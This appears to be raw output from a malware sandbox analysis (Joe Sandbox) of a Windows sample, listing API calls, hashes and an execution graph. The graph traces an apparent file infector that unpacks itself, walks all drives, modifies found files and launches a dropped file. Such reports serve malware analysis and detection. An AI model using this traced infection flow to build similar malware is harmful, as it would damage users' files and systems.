                                Similarity
                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                • String ID:
                                • API String ID: 2427264223-0
                                • Opcode ID: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
                                • Instruction ID: 4f065410a833747b2fa51117dbabb5f5d23e2195355c7fa658f3e8009557e2db
                                • Opcode Fuzzy Hash: 3e2e31803638fc65cc788ac61652c8e8c59aff9d5a362736e4cf6afc50ca3ab6
                                • Instruction Fuzzy Hash: F4B09B31000158BBDB012F23DD4DC4D7F55DB403917104035F914190B1DFB1AD5299D4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 124 406448-40646a HeapCreate 125 40646c-40646d 124->125 126 40646e-406477 124->126
                                APIs
                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040645D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: CreateHeap
                                • String ID:
                                • API String ID: 10892065-0
                                • Opcode ID: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
                                • Instruction ID: 0b411b1c4460c74cfc81a185269fba42b9c3ed74cd733ab1816ec4eaf215ceb7
                                • Opcode Fuzzy Hash: 98c8d639fe9f43e90fece2508cdc85c67e97022a4ea6df9a20a3cb5296762ef1
                                • Instruction Fuzzy Hash: C1D05E766943055AEB145F756E087663BDCD784795F008436B80DC6590E5B4C5609908

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 127 4023d4-4023e0 call 4022a8 129 4023e5-4023e9 127->129
                                APIs
                                • _doexit.LIBCMT ref: 004023E0
                                  • Part of subcall function 004022A8: __lock.LIBCMT ref: 004022B6
                                  • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 004022ED
                                  • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402302
                                  • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040232C
                                  • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 00402342
                                  • Part of subcall function 004022A8: __decode_pointer.LIBCMT ref: 0040234F
                                  • Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040237E
                                  • Part of subcall function 004022A8: __initterm.LIBCMT ref: 0040238E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                • String ID:
                                • API String ID: 1597249276-0
                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                • Instruction ID: 56d6ec75f9ca001e469de65b509690461a690c23f8048b21a9ddfe31d5bb7ce0
                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                • Instruction Fuzzy Hash: D5B0927258020833EA202582AC07F063B1987C0B64E240066BA0C295E1A9A6A961808A
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 00404424
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404439
                                • UnhandledExceptionFilter.KERNEL32(0040E2D4), ref: 00404444
                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00404460
                                • TerminateProcess.KERNEL32(00000000), ref: 00404467
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                • String ID:
                                • API String ID: 2579439406-0
                                • Opcode ID: 7978dca4579781c9c5fcb4871f2d337207cca24b5e6b76e3f09e85183cb6994f
                                • Instruction ID: 45eb3ae3ae9be5a42db89100f48cb7a8cce6cf88836da85b8f83d6c6f4e9d677
                                • Opcode Fuzzy Hash: 7978dca4579781c9c5fcb4871f2d337207cca24b5e6b76e3f09e85183cb6994f
                                • Instruction Fuzzy Hash: 8321EFB4401210EFD744DF25FA456893BB4FB08300F1085BAEA08E32B0E3F859A48B1E
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_00005F8E), ref: 00405FD5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 5dadea657f4094459ad9e9ed7ed5bd322b2888e839c78983bdf37fdd45e3efba
                                • Instruction ID: b5881ed52c6df8735d000d9ac44c9edf02bf042a1d3980fa659c74c026935dce
                                • Opcode Fuzzy Hash: 5dadea657f4094459ad9e9ed7ed5bd322b2888e839c78983bdf37fdd45e3efba
                                • Instruction Fuzzy Hash: 1D9002613515115AC60027B15E0965B26949A5960675108716A12E4094DABC8054991A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                • Instruction ID: 7b357e6e517895dbe12adbe9a7f777a7b357507db5a8af5602780b1ce824b875
                                • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                • Instruction Fuzzy Hash: 79819531608B458FC714DF29D8906EAB7E2EFD6314F14892ED0EA87751D738A889CB49
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: __wsplitpath_calloc_strncpy$__wmakepath
                                • String ID: \$\
                                • API String ID: 550690-164819647
                                • Opcode ID: bbff70bb15c8dd2f564c854139eba0895367efbb5d87954141f89174ae00e88c
                                • Instruction ID: 3ab556dc7228b43ace4fc2f08a2dff9a1329299df0561b3fd7c49054973d16d9
                                • Opcode Fuzzy Hash: bbff70bb15c8dd2f564c854139eba0895367efbb5d87954141f89174ae00e88c
                                • Instruction Fuzzy Hash: 46314AB1404380AED325DB10CC81FEBB3E8AF89704F04456EF6C567191E278994887AB
                                APIs
                                • _memset.LIBCMT ref: 00401375
                                • SetConsoleCtrlHandler.KERNEL32 ref: 0040138C
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,00000001), ref: 004013AF
                                • _fprintf.LIBCMT ref: 004013C7
                                • WaitForSingleObject.KERNEL32(00000001,000000FF), ref: 004013E6
                                • GetExitCodeProcess.KERNEL32(00000001,00000000), ref: 004013F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: Process$CodeConsoleCreateCtrlExitHandlerObjectSingleWait_fprintf_memset
                                • String ID: D$failed to create process.$failed to get exit code from process.
                                • API String ID: 1493708761-2047806753
                                • Opcode ID: 554cc121d98ebd15e674268335262f3739016ec637f7076d6ae0b89d70685e2d
                                • Instruction ID: c0b4ef9865efaefbb4655db6787bc9468adefed468afa6ea3df7463377fb4bcc
                                • Opcode Fuzzy Hash: 554cc121d98ebd15e674268335262f3739016ec637f7076d6ae0b89d70685e2d
                                • Instruction Fuzzy Hash: F41191B0648301AFE310EF65CD46F1B77E8AB84B04F108D2DF659E62D0E6B8D5188B5A
                                APIs
                                • __getptd.LIBCMT ref: 004046A1
                                  • Part of subcall function 0040513E: __getptd_noexit.LIBCMT ref: 00405141
                                  • Part of subcall function 0040513E: __amsg_exit.LIBCMT ref: 0040514E
                                • __amsg_exit.LIBCMT ref: 004046C1
                                • __lock.LIBCMT ref: 004046D1
                                • InterlockedDecrement.KERNEL32(?), ref: 004046EE
                                • InterlockedIncrement.KERNEL32(00A21690), ref: 00404719
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                • String ID:
                                • API String ID: 4271482742-0
                                • Opcode ID: 150209a0db33c1df6409144fcaa29095b5e5db799e09e61fce24405c8d76a00e
                                • Instruction ID: 182624ffc8af25ae610049a1f2154bb3440c6d97a259276cb1923d31de180150
                                • Opcode Fuzzy Hash: 150209a0db33c1df6409144fcaa29095b5e5db799e09e61fce24405c8d76a00e
                                • Instruction Fuzzy Hash: 8F01EDB29026209BC720AF6698057AE7A60BF41716F04813BEA60772E0C73C6942CFDD
                                APIs
                                • __lock.LIBCMT ref: 00403AAB
                                  • Part of subcall function 00403EC9: __mtinitlocknum.LIBCMT ref: 00403EDF
                                  • Part of subcall function 00403EC9: __amsg_exit.LIBCMT ref: 00403EEB
                                  • Part of subcall function 00403EC9: EnterCriticalSection.KERNEL32(?,?,?,004019E2,?), ref: 00403EF3
                                • ___sbh_find_block.LIBCMT ref: 00403AB6
                                • ___sbh_free_block.LIBCMT ref: 00403AC5
                                • HeapFree.KERNEL32(00000000,?,0040F570,0000000C,0040512F,00000000,?,0040396D,?,00000001,?,?,00403E53,00000018,0040F5D8,0000000C), ref: 00403AF5
                                • GetLastError.KERNEL32(?,0040396D,?,00000001,?,?,00403E53,00000018,0040F5D8,0000000C,00403EE4,?,?,?,004019E2,?), ref: 00403B06
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                • String ID:
                                • API String ID: 2714421763-0
                                • Opcode ID: a891d932a0e071ca475934fd523367eacad69da5e60af7b176750d227c8f8db1
                                • Instruction ID: c008ab2ad1e45627aee82902e3c9ce951945f4afddf5f4c3619f6cb35890dbb1
                                • Opcode Fuzzy Hash: a891d932a0e071ca475934fd523367eacad69da5e60af7b176750d227c8f8db1
                                • Instruction Fuzzy Hash: 92017CB1A11211AADF30AF729C06B5F7E6CAF4176AF10843FF040B61C2DA7D9A408A5C
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: _sprintf$_calloc
                                • String ID: %s
                                • API String ID: 1847391153-3874713491
                                • Opcode ID: bd7563a1cb415c53eaa3f3605baf5fb9548cd0f100c108af1577adfff1cba989
                                • Instruction ID: 2acd6506d57c741a920e626a4b5d567ea857566bf975ef263a1adc6b9bcf76df
                                • Opcode Fuzzy Hash: bd7563a1cb415c53eaa3f3605baf5fb9548cd0f100c108af1577adfff1cba989
                                • Instruction Fuzzy Hash: 7A2138312042025FC311CF1CC494AE6B3E69F86348F15416AF885EB2B2DA76E90E87D5
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040A288
                                • __isleadbyte_l.LIBCMT ref: 0040A2BC
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A2ED
                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,?,00000000,?,?,00000000), ref: 0040A35B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: 94773e464a501d964cb96ea099f2e7eec610af71810bc110438a39ae59925cc0
                                • Instruction ID: 7f9a93b8890bd1a92f443f0c43a6467d4f975921de71c3944034b7a742ca2f9f
                                • Opcode Fuzzy Hash: 94773e464a501d964cb96ea099f2e7eec610af71810bc110438a39ae59925cc0
                                • Instruction Fuzzy Hash: A5319331900345EFDF20DFA4C8809AE7BA5AF01310B1585BEE861AB3D1D739DE60DB5A
                                APIs
                                • __getptd.LIBCMT ref: 00404E0D
                                  • Part of subcall function 0040513E: __getptd_noexit.LIBCMT ref: 00405141
                                  • Part of subcall function 0040513E: __amsg_exit.LIBCMT ref: 0040514E
                                • __getptd.LIBCMT ref: 00404E24
                                • __amsg_exit.LIBCMT ref: 00404E32
                                • __lock.LIBCMT ref: 00404E42
                                Memory Dump Source
                                • Source File: 00000000.00000002.1232078829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1232066123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232092159.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232104306.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232118759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1232142912.0000000000415000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_ArjM1qx3hV.jbxd
                                Similarity
                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                • String ID:
                                • API String ID: 3521780317-0
                                • Opcode ID: 2388708164fe7afdc53ff6d0dcdca69360b68789bed62c157f7e008279cbb2a2
                                • Instruction ID: 0510b9d258df4cc48bf533c41f06a4eb4879bd88572707fc40d1bee35bf251e0
                                • Opcode Fuzzy Hash: 2388708164fe7afdc53ff6d0dcdca69360b68789bed62c157f7e008279cbb2a2
                                • Instruction Fuzzy Hash: 20F012B29517008AD720BB75D406B4E77A57F80716F10867FE640BB3D2CB7C59018B99

                                Execution Graph

                                Execution Coverage:28.9%
                                Dynamic/Decrypted Code Coverage:10.4%
                                Signature Coverage:18.9%
                                Total number of Nodes:297
                                Total number of Limit Nodes:11
                                execution_graph 1331 bc6159 1332 bc615f VirtualFree 1331->1332 1339 bc60c7 1332->1339 1333 bc6198 VirtualFree 1341 bc61b2 1333->1341 1334 bc60d5 VirtualAlloc 1334->1339 1335 bc6389 VirtualProtect 1338 bc63b7 1335->1338 1336 bc63fc VirtualProtect 1337 bc6400 1336->1337 1338->1336 1340 bc63e7 VirtualProtect 1338->1340 1339->1332 1339->1333 1339->1334 1340->1336 1340->1338 1341->1335 1342 bc62fb 1341->1342 1343 bc6014 1344 bc6035 GetModuleHandleA 1343->1344 1345 bc605f 1343->1345 1346 bc604d GetProcAddress 1344->1346 1347 bc6058 1346->1347 1347->1345 1347->1346 1347->1347 1014 bc6076 1015 bc607b 1014->1015 1020 bc60c7 1014->1020 1017 bc60b0 VirtualAlloc 1015->1017 1015->1020 1024 bc61b2 1015->1024 1016 bc615f VirtualFree 1016->1020 1017->1020 1018 bc6198 VirtualFree 1018->1024 1019 bc60d5 VirtualAlloc 1019->1020 1020->1016 1020->1018 1020->1019 1021 bc6389 VirtualProtect 1023 bc63b7 1021->1023 1022 bc63fc VirtualProtect 1025 bc6400 1022->1025 1023->1022 1023->1023 1026 bc63e7 VirtualProtect 1023->1026 1024->1021 1027 bc62fb 1024->1027 1026->1022 1026->1023 1028 bc14e1 1029 bc14fd GetModuleHandleA 1028->1029 1030 bc1541 1028->1030 1031 bc151a VirtualQuery 1029->1031 1032 bc1512 1029->1032 1033 bc1549 1030->1033 1034 bc1573 1030->1034 1031->1032 1032->1030 1038 bc1566 1033->1038 1056 bc1af9 1033->1056 1039 bc1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1034->1039 1036 bc1579 ExitProcess 1040 bc167f 1039->1040 1041 bc167a 1039->1041 1062 bc1718 GetSystemTimeAsFileTime 1040->1062 1074 bc139f GetVersionExA 1041->1074 1044 bc16ca 1045 bc16d7 1044->1045 1046 bc16d0 1044->1046 1049 bc16dd lstrcpy 1045->1049 1050 bc170f 1045->1050 1095 bc1581 1046->1095 1047 bc1686 1047->1044 1051 bc16a0 CreateThread 1047->1051 1049->1036 1050->1036 1067 bc2c48 memset 1051->1067 1311 bc1099 1051->1311 1055 bc1718 3 API calls 1055->1044 1057 bc1b09 1056->1057 1058 bc1b11 1056->1058 1059 bc1638 188 API calls 1057->1059 1060 bc1b16 CreateThread 1058->1060 1061 bc1b0f 1058->1061 1059->1061 1060->1061 1330 bc1638 189 API calls 1060->1330 1061->1038 1063 bc1754 1062->1063 1064 bc1735 SHSetValueA 1062->1064 1065 bc175a SHGetValueA 1063->1065 1066 bc1786 __aulldiv 1063->1066 1064->1066 1065->1066 1066->1047 1101 bc1973 PathFileExistsA 1067->1101 1069 bc2cb2 1072 bc16ba WaitForSingleObject 1069->1072 1073 bc2cbb VirtualFree 1069->1073 1070 bc2c8f CreateThread WaitForMultipleObjects 1070->1069 1123 bc2b8c memset GetLogicalDriveStringsA 1070->1123 1072->1055 1073->1072 1075 bc13cf LookupPrivilegeValueA 1074->1075 1076 bc14da 1074->1076 1077 bc13e7 1075->1077 1078 bc13ef 1075->1078 1076->1040 1291 bc119f GetCurrentProcess OpenProcessToken 1077->1291 1078->1076 1296 bc120e GetModuleHandleA GetProcAddress 1078->1296 1084 bc1448 GetCurrentProcessId 1084->1076 1085 bc1457 1084->1085 1085->1076 1086 bc1319 3 API calls 1085->1086 1087 bc147f 1086->1087 1088 bc1319 3 API calls 1087->1088 1089 bc148e 1088->1089 1089->1076 1090 bc1319 3 API calls 1089->1090 1091 bc14b4 1090->1091 1092 bc1319 3 API calls 1091->1092 1093 bc14c3 1092->1093 1094 bc1319 3 API calls 1093->1094 1094->1076 1310 bc185b GetSystemTimeAsFileTime srand rand srand rand 1095->1310 1097 bc1592 wsprintfA wsprintfA lstrlen CreateFileA 1098 bc15fb WriteFile CloseHandle 1097->1098 1099 bc1633 1097->1099 1098->1099 1100 bc161d ShellExecuteA 1098->1100 1099->1050 1100->1099 1102 bc19a0 1101->1102 1106 bc1ac7 1101->1106 1103 bc19af CreateFileA 1102->1103 1104 bc1a28 GetFileSize 1103->1104 1105 bc19c4 Sleep 1103->1105 1108 bc1a38 1104->1108 1109 bc1a80 1104->1109 1105->1103 1107 bc19d5 1105->1107 1106->1069 1106->1070 1122 bc185b GetSystemTimeAsFileTime srand rand srand rand 1107->1122 1108->1109 1111 bc1a3d VirtualAlloc 1108->1111 1112 bc1a8d CloseHandle 1109->1112 1113 bc1a96 1109->1113 1111->1109 1115 bc1a53 1111->1115 1112->1113 1116 bc1a9c DeleteFileA 1113->1116 1117 bc1aad 1113->1117 1114 bc19da wsprintfA CopyFileA 1114->1104 1119 bc1a0d CreateFileA 1114->1119 1115->1109 1120 bc1a59 ReadFile 1115->1120 1116->1117 1117->1106 1121 bc1ab8 VirtualFree 1117->1121 1119->1104 1119->1116 1120->1109 1120->1115 1121->1106 1122->1114 1124 bc2bc8 1123->1124 1125 bc2c09 WaitForMultipleObjects 1123->1125 1128 bc2bfa lstrlen 1124->1128 1129 bc2bd2 GetDriveTypeA 1124->1129 1130 bc2be3 CreateThread 1124->1130 1126 bc2c3c 1125->1126 1127 bc2c2a CreateThread 1125->1127 1127->1126 1134 bc2845 1127->1134 1128->1124 1128->1125 1129->1124 1129->1128 1130->1128 1131 bc2b7d 1130->1131 1144 bc29e2 memset wsprintfA 1131->1144 1281 bc274a memset memset SHGetSpecialFolderPathA wsprintfA 1134->1281 1136 bc2878 DeleteFileA 1138 bc288c VirtualFree 1136->1138 1139 bc289a 1136->1139 1137 bc2853 1137->1136 1140 bc2692 8 API calls 1137->1140 1143 bc239d 186 API calls 1137->1143 1138->1139 1141 bc28ab 1139->1141 1142 bc28a4 CloseHandle 1139->1142 1140->1137 1142->1141 1143->1137 1145 bc2abc memset memset FindFirstFileA 1144->1145 1146 bc2a3a memset lstrlen lstrcpyn strrchr 1144->1146 1158 bc28b8 memset wsprintfA 1145->1158 1146->1145 1147 bc2a88 1146->1147 1147->1145 1149 bc2a9a lstrcmpiA 1147->1149 1151 bc2aad lstrlen 1149->1151 1152 bc2b74 1149->1152 1151->1145 1151->1149 1153 bc2b61 FindNextFileA 1154 bc2b6d FindClose 1153->1154 1155 bc2b23 1153->1155 1154->1152 1156 bc2b35 lstrcmpiA 1155->1156 1157 bc28b8 174 API calls 1155->1157 1156->1154 1156->1155 1157->1153 1159 bc2951 memset 1158->1159 1160 bc2905 1158->1160 1159->1153 1160->1159 1161 bc291b memset wsprintfA 1160->1161 1162 bc2956 strrchr 1160->1162 1163 bc29e2 180 API calls 1161->1163 1162->1159 1164 bc2967 lstrcmpiA 1162->1164 1163->1159 1165 bc2988 lstrcmpiA 1164->1165 1166 bc297a 1164->1166 1165->1159 1168 bc2994 1165->1168 1176 bc1e6e 1166->1176 1169 bc29ad strstr 1168->1169 1170 bc29a5 lstrcpy 1168->1170 1171 bc29cb 1169->1171 1172 bc29d3 1169->1172 1170->1169 1219 bc239d strstr 1171->1219 1241 bc2692 1172->1241 1177 bc1e7d 1176->1177 1250 bc1df6 strrchr 1177->1250 1180 bc1eb0 SetFileAttributesA CreateFileA 1181 bc2332 1180->1181 1182 bc1edf 1180->1182 1184 bc233d UnmapViewOfFile 1181->1184 1185 bc2346 1181->1185 1255 bc1915 1182->1255 1184->1185 1187 bc234b CloseHandle 1185->1187 1188 bc2350 1185->1188 1187->1188 1189 bc2356 CloseHandle 1188->1189 1190 bc2391 1188->1190 1189->1190 1190->1159 1191 bc1f2e 1191->1181 1261 bc1c81 1191->1261 1195 bc1f92 1196 bc1c81 2 API calls 1195->1196 1197 bc1f9f 1196->1197 1197->1181 1198 bc1af9 169 API calls 1197->1198 1199 bc2024 1197->1199 1203 bc1fc0 1198->1203 1199->1181 1200 bc1af9 169 API calls 1199->1200 1201 bc207a 1200->1201 1202 bc1af9 169 API calls 1201->1202 1207 bc2090 1202->1207 1203->1181 1203->1199 1204 bc1af9 169 API calls 1203->1204 1205 bc1ffe 1204->1205 1206 bc2013 FlushViewOfFile 1205->1206 1206->1199 1208 bc20bb memset memset 1207->1208 1209 bc20f5 1208->1209 1210 bc1c81 2 API calls 1209->1210 1212 bc21de 1210->1212 1211 bc2226 memcpy UnmapViewOfFile CloseHandle 1266 bc1b8a 1211->1266 1212->1211 1214 bc226e 1274 bc185b GetSystemTimeAsFileTime srand rand srand rand 1214->1274 1216 bc22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1217 bc1915 3 API calls 